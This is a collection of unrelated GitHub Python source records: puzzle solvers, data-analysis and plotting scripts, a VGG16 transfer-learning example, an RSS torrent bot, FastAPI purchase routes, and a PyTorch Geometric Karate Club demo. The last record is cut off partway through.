'Han':([1e-18,1e-18],[np.inf,np.inf]),'Luong':([1e-18,1e-18],[np.inf,np.inf]),'Andrews':([1e-18,1e-18],[np.inf,np.inf]),'Aiba':([1e-18,1e-18],[np.inf,np.inf]),\n 'Moser':([1e-18,1e-18],[np.inf,np.inf]),'Edward':([1e-18,1e-18],[np.inf,np.inf]),'Webb':([1e-18,1e-18],[np.inf,np.inf]),'Yano':([1e-18,1e-18],[np.inf,np.inf]),\n 'Haldane':([1e-18,1e-18],[np.inf,np.inf])}\n #bounds = ([1e-18,1e-18],[np.inf,np.inf])\n\n #Create dictionary of additional bounds to be applied to each model, these are inserted into curve fit to set limits to which parameters may fall, with and without\n #estimiated parameters as these additional parameters may not be estimated from menten kenetics theory\n ad_bounds = {'Menten':([],[]),'Inverse_Monod':([],[]),'exp_growth':([],[]),'Han':([Smin,-np.inf,-np.inf],[np.inf,np.inf,np.inf]),'Luong':([Smin,-np.inf],[np.inf,np.inf])\n ,'Andrews':([1e-13],[np.inf]),'Aiba':([0],[np.inf]),'Moser':([0],[np.inf]),'Edward':([1e-13],[np.inf]),'Webb':([1e-13,-np.inf],[np.inf,np.inf]),\n 'Yano':([1e-13,-np.inf],[np.inf,np.inf]),'Haldane':([1e-13,Smin],[np.inf,np.inf])}\n\n return (Smin,bounds,ad_bounds)\n","repo_name":"ristojm/Biofit","sub_path":"Biofit_functions.py","file_name":"Biofit_functions.py","file_ext":"py","file_size_in_byte":16770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"809502621","text":"from __future__ import annotations\nfrom sys import argv\nfrom functools import lru_cache\nfrom collections import deque, defaultdict\nfrom typing import List, Tuple, Generator, Dict, DefaultDict, Deque, Union\n\n\nclass Puzzle(object):\n def __init__(\n self,\n puzzle: List[List[int]],\n x: Union[int, None] = None,\n y: Union[int, None] = None,\n ) -> None:\n \"\"\"\n Constructor for the Puzzle class. Requires the puzzle 2D list\n that represents the puzzle. Optionally takes the x and y index\n positions of the empty space in the puzzle. If not given, they\n will be calculated.\n \"\"\"\n self.puzzle = puzzle\n if x and y:\n self.x: int = x\n self.y: int = y\n return\n # Loop through the puzzle and search for the empty space\n for Y, row in enumerate(puzzle):\n for X, v in enumerate(row):\n if v == 0:\n self.y: int = Y\n self.x: int = X\n return\n # If the given puzzle does not have an empty space signified by a 0\n raise Exception(f\"Puzzle {puzzle} does not have any empty space (0)\")\n\n @staticmethod\n def read_from_file(filename: str) -> Puzzle:\n \"\"\"Read and generate a puzzle from a file\"\"\"\n with open(filename, \"r\") as f:\n w, h = map(int, f.readline().split())\n return Puzzle([[int(v) for v in f.readline().split()] for _ in range(h)])\n\n @staticmethod\n def solved_of_size(n: int) -> Puzzle:\n \"\"\"Generate a solved puzzle of size (n x n)\"\"\"\n answer: List[List[int]] = []\n for i in range(n - 1):\n answer.append(list(range(i * n + 1, (i + 1) * n + 1)))\n answer.append(list(range((n - 1) * n + 1, n * n)) + [0])\n return Puzzle(answer)\n\n def to_tuple(self) -> Tuple[Tuple[int]]:\n \"\"\"Convert the puzzle object into a tuple of tuples (for use in a dict)\"\"\"\n return tuple(tuple(row) for row in self.puzzle)\n\n def move_into_empty(self, x: int, y: int) -> None:\n \"\"\"Move the tile at a given position into the empty space\"\"\"\n self.puzzle[self.y][self.x], self.puzzle[y][x] = (\n self.puzzle[y][x],\n self.puzzle[self.y][self.x],\n )\n self.y, self.x = y, x\n\n def next_moves(self) -> Generator[Puzzle]:\n \"\"\"Given the current state of the puzzle, find all possible moves\"\"\"\n around: List[Tuple[int]] = [\n (self.x - 1, self.y),\n (self.x + 1, self.y),\n (self.x, self.y - 1),\n (self.x, self.y + 1),\n ]\n # Look around at all valid neighbors\n for nx, ny in around:\n if (0 <= nx < len(self.puzzle[0])) and (0 <= ny < len(self.puzzle)):\n # Make a copy of the base puzzle\n next_puzzle = self.__copy__()\n # Perform the appropriate swap\n next_puzzle.move_into_empty(nx, ny)\n # Yield the newly created puzzle\n yield next_puzzle\n\n def __copy__(self) -> Puzzle:\n \"\"\"Create a deep copy of a Puzzle object\"\"\"\n return Puzzle([row.copy() for row in self.puzzle], x=self.x, y=self.y)\n\n def __str__(self) -> str:\n \"\"\"to string method for the Puzzle class\"\"\"\n return \"\\n\".join(\n \" \".join(map(lambda v: f\"{v:2d}\" if v else \" \", row))\n for row in self.puzzle\n )\n\n\nclass PuzzleSolver(object):\n def __init__(self, n: int) -> None:\n \"\"\"Constructor for the PuzzleSolver class\"\"\"\n # Generate a solved puzzle of size (n x n)\n solved: Puzzle = Puzzle.solved_of_size(n)\n\n # Initialize the solver dictionary.\n # The value at a given puzzle is it's parent puzzle.\n # This parent puzzle is the puzzle is the result of the transformation\n # that should be made on the current puzzle to optimally solve.\n self.solver: Dict[Tuple[Tuple[int]] : Tuple[Tuple[int]]] = dict()\n # The solved puzzle has no parent. It is already solved\n self.solver[solved.to_tuple()] = None\n\n # Start the search from the solved puzzle\n q: Deque[Puzzle] = deque()\n q.append(solved)\n\n # While there are more puzzles to be inspected, continue searching\n while len(q):\n # Get the current puzzle\n current_puzzle: Puzzle = q.popleft()\n # Go through every possible next move for the current puzzle\n for next_puzzle in current_puzzle.next_moves():\n # If there is a faster way to get to this puzzle state, skip it\n if next_puzzle.to_tuple() not in self.solver:\n # If this is the first time we're seeing it, record it's parent\n self.solver[next_puzzle.to_tuple()] = current_puzzle.to_tuple()\n # And add it to the queue for future inspection\n q.append(next_puzzle)\n\n @lru_cache(maxsize=None)\n def solve_steps(self, puzzle_tuple: Union[Tuple[Tuple[int]], None]) -> int:\n \"\"\"Given a puzzle, get the number of steps to optimally solve that puzzle\"\"\"\n if puzzle_tuple not in self.solver:\n return -1\n next_puzzle = self.solver[puzzle_tuple]\n return 1 + self.solve_steps(next_puzzle) if next_puzzle else 0\n\n def show_required_moves(self, puzzle_tuple: Tuple[Tuple[int]]) -> None:\n \"\"\"Given a puzzle, print the exact moves required to optimally solve\"\"\"\n if puzzle_tuple not in self.solver:\n print(\"Given puzzle is unsolvable.\")\n return\n current_puzzle = puzzle_tuple\n next_puzzle = self.solver[current_puzzle]\n # While the puzzle hasn't been solved, print the move\n while next_puzzle != None:\n print(get_diff(current_puzzle, next_puzzle))\n current_puzzle, next_puzzle = next_puzzle, self.solver[next_puzzle]\n\n def show_solve_trace(self, puzzle_tuple: Union[Tuple[Tuple[int]], None]) -> int:\n \"\"\"Given a puzzle, print the steps to optimally solve that puzzle\"\"\"\n # If this puzzle is not reachable\n if puzzle_tuple not in self.solver:\n print(\"Given puzzle is unsolvable.\")\n return -1\n\n # Print the puzzle out and a line separator\n print(\n \"\\n\".join(\n \" \".join(map(lambda v: f\"{v:2d}\" if v else \" \", row))\n for row in puzzle_tuple\n )\n )\n print(\"-\" * (len(puzzle_tuple) * 3 - 1))\n\n next_puzzle = self.solver[puzzle_tuple]\n # If puzzle_tuple describes the solved puzzle\n if next_puzzle == None:\n # No moves need to be made\n return 0\n\n # Otherwise, search this puzzle's parent and count a move\n return 1 + self.show_solve_trace(next_puzzle)\n\n\ndef get_diff(old_puzzle: Tuple[Tuple[int]], new_puzzle: Tuple[Tuple[int]]) -> int:\n \"\"\"Given two move-adjacent puzzles in the tuple format, find which tile was moved\"\"\"\n for old_row, new_row in zip(old_puzzle, new_puzzle):\n for old_value, new_value in zip(old_row, new_row):\n # Look through each cell for the empty space.\n # Whatever replaced the empty space was the tile that moved\n if old_value == 0:\n return new_value\n if new_value == 0:\n return old_value\n return -1\n\n\ndef main(filename: str, show_moves_only: bool) -> None:\n puzzle = Puzzle.read_from_file(filename)\n solver = PuzzleSolver(len(puzzle.puzzle))\n if show_moves_only:\n solver.show_required_moves(puzzle.to_tuple())\n else:\n num_moves = solver.show_solve_trace(puzzle.to_tuple())\n print(f\"Solved in {num_moves} move{'s' * (num_moves != 1)}\")\n\n\ndef display_frequencies():\n frequencies: DefaultDict[List:int] = defaultdict(list)\n\n puzzle_solver: PuzzleSolver = PuzzleSolver(3)\n for puzzle_tuple in puzzle_solver.solver:\n frequencies[puzzle_solver.solve_steps(puzzle_tuple)].append(puzzle_tuple)\n\n total_puzzles: int = 0\n for frequency in frequencies:\n print(f\"{frequency:2d}: {len(frequencies[frequency]):5d}\")\n total_puzzles += len(frequencies[frequency])\n\n print(\"Total:\", total_puzzles)\n\n\nif __name__ == \"__main__\":\n if 2 <= len(argv) <= 3:\n main(argv[1], len(argv) == 3 and argv[2] in [\"-m\", \"--moves\", \"--moves-only\"])\n else:\n display_frequencies()\n","repo_name":"andjf/sliding_puzzle_solver","sub_path":"solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72718524601","text":"import random\n\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.sql.expression import func, select\n\nfrom .conn import get_connection\nfrom .models import Pessoa, Transacao, UltimaCompra\nfrom core.utils import (name_fake, address_fake,\n company_fake, value_fake,\n status_fake, contract_fake,\n date_fake)\n\n\nclass Manager:\n\n def __init__(self):\n get_connection()\n\n def all(self):\n return list(Pessoa.objects.values().all())\n\n def get(self, cpf):\n return Pessoa.objects.values().get({'_id':cpf})\n\n def detele(self):\n Pessoa.objects.all().delete()\n \n def random_create(self, lista_cpf):\n for person_info in lista_cpf:\n ultima_compra = UltimaCompra( \n empresa=company_fake(),\n data=date_fake(),\n valor=value_fake()\n )\n\n transacoes = []\n for _ in range(3):\n transacoes.append(Transacao(\n data=date_fake(),\n valor=value_fake()\n ))\n\n Pessoa(\n cpf=person_info,\n ultima_consulta=date_fake(),\n transacoes=transacoes,\n ultima_compra=ultima_compra\n ).save()","repo_name":"asafepy/desafio-api-bureau","sub_path":"base_c/core/db/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25079231383","text":"import json\nfrom os import path\nimport collections\n\nfrom scipy.sparse import data\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport japanize_matplotlib # matplotで日本語使える\n\nID = [255710, 227300, 427520]\n# ID = [255710, 227300]\n\nFORUM_FILENAMES = list(map(lambda x: \"../../data/\" +\n str(x) + \"/\" + str(x) + \"_forum_cleaned.json\", ID))\nREVIEW_FILENAMES = list(map(lambda x: \"../../data/\" +\n str(x) + \"/\" + str(x) + \"_review_cleaned_out.json\", ID))\n\nLABELS = [\"review\\n(Cities: Skylines)\", \"review\\n(Euro Truck Sim)\", \"review\\n(Factorio)\",\n \"forum\\n(Cities: Skylines)\", \"forum\\n(Euro Truck Sim)\", \"forum\\n(Factorio)\"]\n# LABELS = [\"review\\n(Cities: Skylines)\", \"review\\n(Euro Truck Sim)\",\n# \"forum\\n(Cities: Skylines)\", \"forum\\n(Euro Truck Sim)\"]\n# LABELS = [\"フォーラム\", \"レビュー\"]\n\nmax_length = 128\n\n\ndef main():\n forums = []\n for f in FORUM_FILENAMES:\n forums.append(load_json(path.join(path.dirname(__file__), f)))\n reviews = []\n for r in REVIEW_FILENAMES:\n reviews.append(load_json(path.join(path.dirname(__file__), r)))\n\n word_count_barplot(forums, reviews)\n # word_count_barplot_horizontal(forums, reviews)\n # frequent_vocabulary(forums, reviews):\n\n\ndef word_count_barplot(forums, reviews): # 単語数の分布\n forums_num_words = []\n for i, forum in enumerate(forums):\n tmp = []\n sum = 0\n for topics in forum:\n tmp.append(topics[\"num_words\"])\n sum += topics[\"num_words\"]\n forums_num_words.append(tmp)\n forum_average = sum / len(forum)\n print(\"[forum{0}]:{1}\".format(ID[i], forum_average))\n\n reviews_num_words = []\n for i, review in enumerate(reviews):\n tmp = []\n sum = 0\n for topics in review:\n tmp.append(topics[\"num_words\"])\n sum += topics[\"num_words\"]\n reviews_num_words.append(tmp)\n review_average = sum / len(review)\n print(\"[review{0}]:{1}\".format(ID[i], review_average))\n\n plt.figure(figsize=(10, 6))\n df = reviews_num_words + forums_num_words\n plt.boxplot(df, labels=LABELS, sym=\"\", showmeans=True)\n plt.show()\n\n\ndef word_count_barplot_horizontal(forums, reviews): # 単語数の分布(横向き棒グラフ)\n forums_num_words = []\n for i, forum in enumerate(forums):\n tmp = []\n sum = 0\n for topics in forum:\n tmp.append(topics[\"num_words\"])\n sum += topics[\"num_words\"]\n forums_num_words.append(tmp)\n forum_average = sum / len(forum)\n print(\"[forum{0}]:{1}\".format(ID[i], forum_average))\n\n reviews_num_words = []\n for i, review in enumerate(reviews):\n tmp = []\n sum = 0\n for topics in review:\n tmp.append(topics[\"num_words\"])\n sum += topics[\"num_words\"]\n reviews_num_words.append(tmp)\n review_average = sum / len(review)\n print(\"[review{0}]:{1}\".format(ID[i], review_average))\n\n plt.figure(figsize=(10, 6))\n df = forums_num_words + reviews_num_words\n plt.boxplot(df, labels=LABELS, sym=\"\",\n showmeans=True, vert=False, widths=.5)\n plt.show()\n\n\ndef frequent_vocabulary(forums, reviews): # 頻出語彙\n plt.rcParams[\"font.size\"] = 18\n for i, forum in enumerate(forums):\n forum_word_list = []\n for topics in forum:\n if topics[\"num_words\"] <= max_length:\n forum_word_list.extend(topics[\"combined\"].split())\n c = collections.Counter(forum_word_list).most_common(20)\n # print(c.most_common(20))\n df = [val[0] for val in c]\n label = [val[1] for val in c]\n plt.title(LABELS[i], fontsize=16)\n plt.barh(df[:: -1], label[:: -1])\n plt.show()\n\n for i, review in enumerate(reviews):\n review_word_list = []\n for topics in review:\n if topics[\"num_words\"] <= max_length:\n review_word_list.extend(topics[\"review_lem\"].split())\n c = collections.Counter(review_word_list).most_common(20)\n # print(c.most_common(20))\n df = [val[0] for val in c]\n label = [val[1] for val in c]\n plt.title(LABELS[i+3], fontsize=16)\n plt.barh(df[:: -1], label[:: -1])\n plt.show()\n\n\ndef load_json(json_filepath):\n with open(json_filepath, mode='r') as f:\n json_data = json.load(f)\n return json_data\n\n\ndef save_json(output_list, json_filepath):\n with open(json_filepath, mode='w') as f:\n json.dump(output_list, f, sort_keys=True, indent=4)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"parthenos0908/steam_review","sub_path":"code/research/research.py","file_name":"research.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9635793370","text":"# 시간 초과\n# import sys\n\n# n = sys.stdin.readline()\n# nums1 = list(map(int, sys.stdin.readline().split()))\n# m = sys.stdin.readline()\n# nums2 = list(map(int, sys.stdin.readline().split()))\n\n# for num in nums2:\n# if num in nums1:\n# print(1)\n# else:\n# print(0)\n\n# 이분 탐색\nn = int(input())\nnums1 = sorted(list(map(int, input().split(' '))))\nm = int(input())\nnums2 = list(map(int, input().split(' ')))\n\ndef binary_search(target, array):\n start = 0 # 시작 인덱스\n end = n-1 # 마지막 인덱스\n pointer = (start + end) // 2 # 현재 포인터가 가르키고 있는 인덱스\n \n while start <= end:\n if array[pointer] == target:\n return 1\n elif array[pointer] < target:\n start = pointer + 1\n else:\n end = pointer - 1\n pointer = (start + end) // 2\n return 0\n\nfor i in range(len(nums2)):\n print(binary_search(nums2[i], nums1))","repo_name":"annahxxl/algorithm-study","sub_path":"problem-solving/boj/solved.ac/class2/수 찾기_1920.py","file_name":"수 찾기_1920.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37667777710","text":"# vgg.py\n# transfer learning using vgg16 conv_base for cats_and_dogs_dataset\n# tested on Ubuntu 16.04 + Tesla K80 (Google Cloud Compute)\n# Zhihan Yang, 10 Mar 19\n\n# \nfrom keras.applications import VGG16 # VGG16 is a function\nconv_base = VGG16(weights='imagenet', include_top=False, input_shape=(150, 150, 3)) # conv_base is a models.Sequential()\n\n# \n# parameters for VGG16 function\n# - 'include_top'\n# - whether to include the densely connected classifier on top of the conv_base: 'True' for yes; 'False' for no\n# - the default classifier corresponds to the 1000 classes of ImageNet\n# - since we want to do a different classification, we want to omit the\n# classifier and train a new one\n# - 'input_shape'\n# - the shape of the image tensors that you'll feed to the network\n# - if you don't pass it, the network will be able to process inputs of any\n# shape\n\n# \nimport os\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\n\n# set up tags for data lookup\nbase_dir = '/Users/yangzhihan/datasets/cats_and_dogs_dataset'\ntrain_dir = os.path.join(base_dir, 'train')\nvalidation_dir = os.path.join(base_dir, 'validation')\ntest_dir = os.path.join(base_dir, 'test')\n\ndatagen = ImageDataGenerator(rescale=1./255) # normalize image\nbatch_size = 20\n\ndef extract_features(directory, sample_count):\n\n features = np.zeros(shape=(sample_count, 4, 4, 512))\n # call 'conv_base.summary()' and you will see that the shape of the output of the final MaxPooling2D is (None, 4, 4, 512)\n\n labels = np.zeros(shape=(sample_count))\n # a label is an n-dim vector with n=the number of categories to classify\n\n generator = datagen.flow_from_directory(directory, target_size=(150, 150), batch_size=batch_size, class_mode='binary')\n # - directory: each folder (train, validation and test) should contain each subdirectory per class\n # - target_size: the dims to which all images found will be resized\n # - class_mode: \"binary\" will be 1D binary labels\n\n i = 0\n for inputs_batch, labels_batch in generator:\n features_batch = conv_base.predict(inputs_batch)\n print(features_batch.shape)\n features[i * batch_size : (i + 1) * batch_size] = features_batch\n labels[i * batch_size : (i + 1) * batch_size] = labels_batch\n i += 1\n if i * batch_size >= sample_count:\n break\n return features, labels\n\ntrain_features, train_labels = extract_features(train_dir, 2000)\nvalidation_features, validation_labels = extract_features(validation_dir, 1000)\ntest_features, test_labels = extract_features(test_dir, 1000)\n\n# \nfrom keras import models\nfrom keras import layers\nfrom keras import optimizers\n\nmodel = models.Sequential()\nmodel.add(layers.Flatten(input_shape=(4, 4, 512)))\nmodel.add(layers.Dense(256, activation='relu', input_dim=4 * 4 * 512))\nmodel.add(layers.Dropout(0.5))\nmodel.add(layers.Dense(1, activation='sigmoid'))\n\nmodel.compile(optimizer=optimizers.RMSprop(lr=2e-5), loss='binary_crossentropy', metrics=['acc'])\nhistory = model.fit(train_features, train_labels, epochs=30, batch_size=20, validation_data=(validation_features, validation_labels))\n\n# \nmodel.save(\"vgg_cats_and_dogs.h5\")\n\n# end\n","repo_name":"zhihanyang2022/cnn-experiments","sub_path":"vgg16_cats_and_dogs.py","file_name":"vgg16_cats_and_dogs.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8748117731","text":"import unittest\nfrom functools import cmp_to_key\n\n\ndef is_right_order(a, b):\n if type(a) is int and type(b) is int:\n if a < b:\n return True\n if a > b:\n return False\n return None\n\n if type(a) is int:\n return is_right_order([a], b)\n\n if type(b) is int:\n return is_right_order(a, [b])\n\n for i in range(max(len(a), len(b))):\n if i == len(a):\n return True\n if i == len(b):\n return False\n ret = is_right_order(a[i], b[i])\n if ret != None:\n return ret\n\n\ndef part_one(filename):\n group = open(filename).read().strip().split(\"\\n\\n\")\n s = 0\n for i, lines in enumerate(group):\n a, b = lines.splitlines()\n a, b = eval(a), eval(b)\n if is_right_order(a, b):\n s += i + 1\n return s\n\n\ndef part_two(filename):\n group = open(filename).read().strip().split(\"\\n\\n\")\n\n d1, d2 = [[2]], [[6]]\n packets = [d1, d2]\n for lines in group:\n a, b = lines.splitlines()\n a, b = eval(a), eval(b)\n packets += [a, b]\n\n packets = sorted(\n packets, key=cmp_to_key(lambda a, b: -1 if is_right_order(a, b) else 1)\n )\n\n for i, p in enumerate(packets):\n if p == d1:\n i1 = i + 1\n elif p == d2:\n i2 = i + 1\n break\n\n return i1 * i2\n\n\ndef main():\n filename = \"input.txt\"\n print(f\"Part 1: {part_one(filename)}\")\n print(f\"Part 2: {part_two(filename)}\")\n\n\nclass TestCase(unittest.TestCase):\n def test_part_one(self):\n self.assertEqual(part_one(\"input_test.txt\"), 13)\n\n def test_part_two(self):\n self.assertEqual(part_two(\"input_test.txt\"), 140)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lizhiquan/advent-of-code","sub_path":"2022/day-13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15795761560","text":"\"\"\"\nModule to understand time performance impact using asyncio for CPU extensive operations\n\"\"\"\n\nimport asyncio\nimport time\n\nCOUNT = 50000000 # 50 M\n\n\nasync def countdown(counter):\n \"\"\"\n function decrements counter by one each time, until counter becomes zero\n Args:\n counter (int): counter value\n \"\"\"\n while counter > 0:\n counter -= 1\n\n\nasync def main():\n \"\"\"\n async function to create tasks and run them at same time\n \"\"\"\n task1 = asyncio.create_task(countdown(COUNT // 2))\n\n task2 = asyncio.create_task(countdown(COUNT // 2))\n\n start = time.time()\n # Start both tasks at same time\n await task1\n await task2\n end = time.time()\n\n print(\"Time taken in seconds -\", end - start)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"Rajpratik71/pythonTraining-CalsoftInc","sub_path":"Day_07/sample_asyncio_doesnot_reduce_cpu_time.py","file_name":"sample_asyncio_doesnot_reduce_cpu_time.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37029822688","text":"import sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\npack = 1000\nsingle = 1000\nfor _ in range(m):\n a, b = map(int, input().split())\n if a <= pack:\n pack = a\n if b <= single:\n single = b\nres = 0\nif n >= 6:\n quo = n//6\n rem = n % 6\n case = (pack*(quo+1), pack*quo+single*rem, single*n)\n res = min(case)\nelse:\n res = min(pack, single*n)\nprint(res)\n","repo_name":"donggoolosori/BOJ_Record","sub_path":"Category/Greedy/1049-기타줄/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"12443373269","text":"import requests\nimport json\nimport feedparser\nimport anitopy\nfrom yaml import load, dump\n\n\nconfig = {\n 'resolution': None,\n 'rpc-url': None\n}\n\nfeeds = []\n\ndef check_torrent(title, feed_id):\n info = anitopy.parse(title)\n\n check_title = False\n check_resolution = False\n\n if len(feeds[feed_id]['resolutions']) == 0:\n feeds[feed_id]['resolutions'] = [config['resolution']]\n\n try:\n if info['video_resolution'] in feeds[feed_id]['resolutions']:\n check_resolution = True\n except KeyError:\n check_resolution = False\n\n if len(feeds[feed_id]['anime-list']) == 0:\n check_title = True\n else:\n for anime in feeds[feed_id]['anime-list']:\n if anime['title'] == info['anime_title']:\n check_title = True\n try:\n if anime['resolution'] == info['video_resolution']:\n check_resolution = True\n else:\n check_resolution = False\n except KeyError:\n print('No resolution was set for the anime: %s' % anime['title'])\n\n return check_title and check_resolution\n\ndef get_session_id():\n res = requests.get(config['rpc-url'])\n return res.headers['X-Transmission-Session-Id']\n\ndef add_torrent(torrent):\n sessionId = get_session_id()\n \n headers = {\n 'content-type': 'application/json',\n 'X-Transmission-Session-Id': sessionId\n }\n \n payload = {\n 'method': 'torrent-add',\n 'arguments': {\n 'filename': torrent\n }\n }\n\n response = requests.post(\n config['rpc-url'], data=json.dumps(payload), headers=headers).json()\n\n print(response)\n\ndef handle_feeds():\n for index, feed in enumerate(feeds):\n if not feed['enabled']:\n continue\n \n torrent = feedparser.parse(feed['url'])\n for entry in torrent.entries:\n if check_torrent(entry.title, int(index)):\n add_torrent(entry.guid)\n\ndef load_config(filename):\n data = None\n with open(filename, 'r') as file:\n data = load(file)\n \n # Set default resolution\n try:\n config['resolution'] = data['default-resolution']\n except KeyError:\n config['resolution'] = '720p'\n\n # Set RPC URL\n try:\n config['rpc-url'] = data['rpc-server']['protocol'] + '://' + data['rpc-server']['host'] + ':' + data['rpc-server']['post'] + data['rpc-server']['path']\n except KeyError:\n config['rpc-url'] = 'http://localhost:9091/transmission/rpc'\n\n # Load feeds\n for feed in data['feeds']:\n feeds.append(feed)\n\n return data\n\ndef main():\n data = load_config('config.yml')\n print(data['rpc-server'])\n \n handle_feeds()\n\nif __name__ == '__main__':\n main()\n","repo_name":"youssefhabri/AniRSS-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"31251708009","text":"from fastapi import APIRouter, Depends\nfrom models import Compra_Vacas, Compra_Cerdos\nfrom middlewares.response import custom_Response_Exito, custom_Response_Error\nfrom middlewares.verify_token import verify_token\nfrom services.compras_services import (\n post_compra_vacas,\n post_compra_cerdos,\n get_compras, \n get_compras_saldo, \n delete_compra, \n get_compra, \n get_compras_by_proveedor\n)\n\nrouter = APIRouter()\n\n# Ruta POST para cargar una compra\n@router.post(\"/vaca\")\nasync def new_compra_vacas(compra: Compra_Vacas, token_data=Depends(verify_token)):\n try:\n response = await post_compra_vacas(compra)\n if response:\n return custom_Response_Exito(compra)\n\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Ruta POST para cargar una compra\n@router.post(\"/cerdo\")\nasync def new_compra_cerdos(compra: Compra_Cerdos, token_data=Depends(verify_token)):\n try:\n response = await post_compra_cerdos(compra)\n if response:\n return custom_Response_Exito(compra)\n\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Ruta GET para obtener todas las Compras\n@router.get(\"/all\")\nasync def get_all_compras(token_data=Depends(verify_token)):\n try:\n compras = await get_compras()\n return custom_Response_Exito(compras)\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Ruta que trae las compras con saldo > 0\n@router.get(\"/saldo\")\nasync def get_all_compras_saldo(token_data=Depends(verify_token)):\n try:\n faenas = await get_compras_saldo()\n return custom_Response_Exito(faenas)\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Ruta que trae una compra por ID\n@router.get(\"/id/{id}\")\nasync def get_compra_id(id: str, token_data=Depends(verify_token)):\n try:\n compra = await get_compra(id)\n return custom_Response_Exito(compra)\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Ruta que trae una compra por ID\n@router.get(\"/proveedor/{proveedor}\")\nasync def get_compras_proveedor(proveedor: str, token_data=Depends(verify_token)):\n try:\n compras = await get_compras_by_proveedor(proveedor)\n return custom_Response_Exito(compras)\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Eliminar una compra por ID\n@router.delete(\"/{id}\")\nasync def delete_compra_id(id: str, token_data=Depends(verify_token)):\n try:\n response = await delete_compra(id)\n message = {\"message\": \"La Compra se eliminó correctamente\"}\n if response:\n return custom_Response_Exito(message)\n else:\n return custom_Response_Error(message=\"No se pudo eliminar la compra\", status_code=400)\n\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n","repo_name":"sergiodm92/api_carnes_gestion_phyton","sub_path":"routers/compras.py","file_name":"compras.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16992020700","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2023-06-11 (Sun) 22:14:18\n\nkarate GNN dev\n\n@author: I.Azuma\n\"\"\"\n#%%\nimport torch\nprint(torch.__version__) # 2.0.1\nprint(torch.cuda.get_device_name()) # NVIDIA GeForce RTX 3090\nimport torch.nn.functional as F\n \nfrom torch_geometric.nn import GCNConv\nfrom torch_geometric.data import Data\nfrom torch_geometric.datasets import KarateClub\nfrom torch_geometric.utils import to_networkx\n \nimport networkx as nx\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n#%%\ndef check_graph(data):\n '''Display graph info'''\n print(\"structure:\", data)\n print(\"key: \", data.keys)\n print(\"node:\", data.num_nodes)\n print(\"edge:\", data.num_edges)\n print(\"node feature:\", data.num_node_features)\n print(\"isolated node:\", data.contains_isolated_nodes())\n print(\"self loop:\", data.contains_self_loops())\n print(\"=== node feature:x ===\")\n print(data['x'])\n print(\"=== node class:y ===\")\n print(data['y'])\n print(\"=== edge format ===\")\n print(data['edge_index']) # sender and receiver\n\n# load dataset\ndataset = KarateClub()\n \nprint(\"graph number:\", len(dataset))\nprint(\"class number:\",dataset.num_classes) \n \ndata = dataset[0]\ncheck_graph(data)\n\n#%%\nnxg = to_networkx(data)\n \n# pagerank\npr = nx.pagerank(nxg)\npr_max = np.array(list(pr.values())).max()\n \n# layout\ndraw_pos = nx.spring_layout(nxg, seed=0) \n \n# node color\ncmap = plt.get_cmap('tab10')\nlabels = data.y.numpy()\ncolors = [cmap(l) for l in labels]\n \n# display\nplt.figure(figsize=(10, 10))\nnx.draw_networkx_nodes(nxg, \n draw_pos,\n node_size=[v / pr_max * 1000 for v in pr.values()],\n node_color=colors, alpha=0.5)\nnx.draw_networkx_edges(nxg, draw_pos, arrowstyle='-', alpha=0.2)\nnx.draw_networkx_labels(nxg, draw_pos, font_size=10)\n \nplt.title('KarateClub')\nplt.show()\n\n#%%\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n hidden_size = 10\n self.conv1 = GCNConv(dataset.num_node_features, hidden_size)\n self.conv2 = GCNConv(hidden_size, dataset.num_classes)\n \n def forward(self, data):\n x, edge_index = data.x, data.edge_index\n x = self.conv1(x, edge_index)\n x = 